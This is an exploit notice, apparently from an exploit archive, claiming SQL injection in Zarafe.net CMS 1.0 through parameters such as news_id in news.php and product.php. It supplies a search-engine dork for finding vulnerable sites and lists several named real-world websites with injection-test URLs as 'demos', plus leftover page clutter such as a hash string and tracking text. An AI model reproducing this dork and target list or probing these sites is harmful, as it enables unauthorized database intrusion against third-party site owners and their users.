Zarafe.net CMS version 1.0 suffers from a remote SQL injection vulnerability.
e3345b31b6f1ea138abf617578aa72c6ecba8aa0faec9735f214e7f72d3f7a47Exploit Title : Zarafe.net CMS SQL Injection Vulnerability
Exploit Author : Iran Cyber Security Group (ICSG)
Discovered By : 0x3a
Vendor HomePage : www.zarrafe.net
Version : 1.0 (Q1)
Date : 4 April, 2016
Tested On : Internet Explorer , Win 98
-----------------------------------------
SQL Injection :
For Finding Target First You Must Search The Dork And Select Your Target
Dork : intext:"طراحی و پیاده سازی توسط زرافه دات نت"
Vulnerable Page : news.php , news_view.php , product.php
Vulnerable Variable : news_id=
Demo :
novinsystemfars.ir/news_view.php?news_id=30'
pezeshkian-pharmacy.ir/news.php?news_id=3'
sdshiraz.com/news.php?news_id=8'
omidoor.com/products.php?product_category_code=12-15'
meysam71.ir/news.php?khabar_id=10'
etehadweb.ir/view_single_news.php?news_id=2
[+][+][+][+][+][+][+]
WWW.IRAN-CYBER.NET[+]
[+][+][+][+][+][+][+]
</0x3a>
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed